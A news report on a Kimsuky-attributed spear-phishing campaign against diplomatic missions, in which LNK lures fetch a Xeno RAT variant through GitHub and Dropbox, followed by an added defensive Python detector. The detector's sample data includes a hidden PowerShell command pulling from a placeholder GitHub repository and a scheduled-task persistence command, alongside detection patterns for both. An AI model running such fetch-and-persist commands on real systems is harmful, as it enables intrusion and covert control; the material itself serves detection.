North Korean threat actors have been attributed to a coordinated cyber espionage campaign targeting diplomatic missions in their southern counterpart between March and July 2025.
The activity manifested in the form of at least 19 spear-phishing emails that impersonated trusted diplomatic contacts with the goal of luring embassy staff and foreign ministry personnel with convincing meeting invites, official letters, and event invitations.
“The attackers leveraged GitHub, typically known as a legitimate developer platform, as a covert command-and-control channel,” Trellix researchers Pham Duy Phuc and Alex Lanstein said.
The infection chains have been observed to rely on trusted cloud storage services such as Dropbox and Daum Cloud, an online service from South Korean internet conglomerate Kakao Corporation, to deliver a variant of an open-source remote access trojan called Xeno RAT that gives the threat actors control of compromised systems.
The campaign is assessed to be the work of a North Korean hacking group called Kimsuky, which was recently linked to phishing attacks that use GitHub as a stager for a Xeno RAT variant known as MoonPeak. Despite the overlaps in infrastructure and tactics, there are indications that the phishing attacks point to China-based operatives.
The email messages, per Trellix, are carefully crafted to appear legitimate, often spoofing real diplomats or officials so as to entice recipients into opening password-protected malicious ZIP files hosted on Dropbox, Google Drive, or Daum. The messages are written in Korean, English, Persian, Arabic, French, and Russian.
“The spear-phishing content was carefully crafted to mimic legitimate diplomatic correspondence,” Trellix said. “Many emails included official signatures, diplomatic terminology, and references to real events (e.g., summits, forums, or meetings).”
“The attackers impersonated trusted entities (embassies, ministries, international organizations), a long-running Kimsuky tactic. By strategically timing lures alongside real diplomatic happenings, they enhanced the credibility.”
Inside the ZIP archive is a Windows shortcut (LNK) file masquerading as a PDF document. Opening it executes PowerShell code that runs an embedded payload, which reaches out to GitHub to fetch next-stage malware and establishes persistence through scheduled tasks. In parallel, a decoy document is displayed to the victim.
The script is also designed to harvest system information and exfiltrate the details to an attacker-controlled private GitHub repository, while simultaneously retrieving additional payloads by parsing the contents of a text file (“onf.txt”) in the repository to extract the Dropbox URL hosting the MoonPeak trojan.
“By simply updating onf.txt in the repository (pointing to a new Dropbox file), the operators could rotate payloads to infected machines,” Trellix explained.
“They also practiced ‘rapid’ infrastructure rotation:…
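The chain described above (a document-lookalike LNK inside a ZIP, PowerShell spawned from the shell, fetches from GitHub or Dropbox, and scheduled-task persistence) leaves a handful of host-level signals a defender can check for. The following is an added example written for this page, not code from Trellix or from the campaign itself; it applies simple heuristics to a constructed ZIP archive and to constructed process-creation events. The file names, repository path and command lines are placeholders, and the indicators are generic patterns rather than the campaign's actual IoCs.

```python
import io
import re
import zipfile
from dataclasses import dataclass

# Archive members that pair a document extension with .lnk, i.e. a shortcut
# dressed up as a PDF or Office/HWP document.
DOC_THEN_LNK = re.compile(r"\.(pdf|docx?|hwpx?|xlsx?)\.lnk$", re.IGNORECASE)

# Cloud services the article names as staging / command-and-control channels.
STAGING_HOSTS = (
    "raw.githubusercontent.com",
    "api.github.com",
    "github.com",
    "dropbox.com",
    "dropboxusercontent.com",
)

HIDDEN_OR_ENCODED = re.compile(
    r"-(?:enc(?:odedcommand)?|e)\s|-w(?:indowstyle)?\s+hidden", re.IGNORECASE
)
SCHED_TASK = re.compile(
    r"schtasks(?:\.exe)?\s+/create|Register-ScheduledTask", re.IGNORECASE
)


def masquerading_shortcuts(zip_bytes: bytes) -> list[str]:
    """Return archive members that look like documents but are Windows shortcuts."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [name for name in zf.namelist() if DOC_THEN_LNK.search(name)]


def build_sample_archive() -> bytes:
    """Constructed stand-in for a lure archive: one fake-PDF shortcut and one
    benign file. The shortcut body is placeholder bytes, not a real LNK."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Forum_Invitation.pdf.lnk", b"placeholder-not-a-real-shortcut")
        zf.writestr("Agenda.pdf", b"%PDF-1.4 placeholder")
    return buf.getvalue()


@dataclass
class ProcessEvent:
    """Minimal process-creation record (e.g. from Sysmon event 1 or EDR telemetry)."""
    parent_image: str
    image: str
    command_line: str


def suspicious_reasons(ev: ProcessEvent) -> list[str]:
    """List the heuristics an event trips; an empty list means nothing matched."""
    reasons = []
    image = ev.image.lower()
    parent = ev.parent_image.lower()
    cmd = ev.command_line.lower()
    # A double-clicked LNK is launched by the shell, so PowerShell with
    # explorer.exe as parent is worth a look (noisy on its own, strong combined).
    if image.endswith(("powershell.exe", "pwsh.exe")) and parent.endswith("explorer.exe"):
        reasons.append("PowerShell launched from the shell (typical of a double-clicked shortcut)")
    if any(host in cmd for host in STAGING_HOSTS):
        reasons.append("command line references GitHub/Dropbox staging host")
    if HIDDEN_OR_ENCODED.search(ev.command_line):
        reasons.append("hidden window or encoded command")
    if SCHED_TASK.search(ev.command_line):
        reasons.append("scheduled-task persistence")
    return reasons


# Constructed sample telemetry: one event mirroring the described chain,
# one bare persistence command, and one benign developer action.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell.exe -w hidden -c "iwr https://raw.githubusercontent.com/EXAMPLE/EXAMPLE/main/onf.txt"',
    ),
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\schtasks.exe",
        r"schtasks /create /tn Updater /tr C:\Users\Public\x.ps1 /sc minute",
    ),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\Git\bin\git.exe", "git pull"),
]


def triage(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map each flagged command line to the reasons it was flagged."""
    return {ev.command_line: r for ev in events if (r := suspicious_reasons(ev))}


if __name__ == "__main__":
    print("shortcuts:", masquerading_shortcuts(build_sample_archive()))
    for cmd, reasons in triage(SAMPLE_EVENTS).items():
        print(cmd, "->", reasons)
```

Each heuristic is weak in isolation (developers do fetch from GitHub, and administrators do create scheduled tasks), so the value is in the combination: a PowerShell process spawned by explorer.exe, with a hidden window, pulling from a file-hosting site and registering a task is the pattern to alert on, while a single match is better treated as context for an analyst than as an alert.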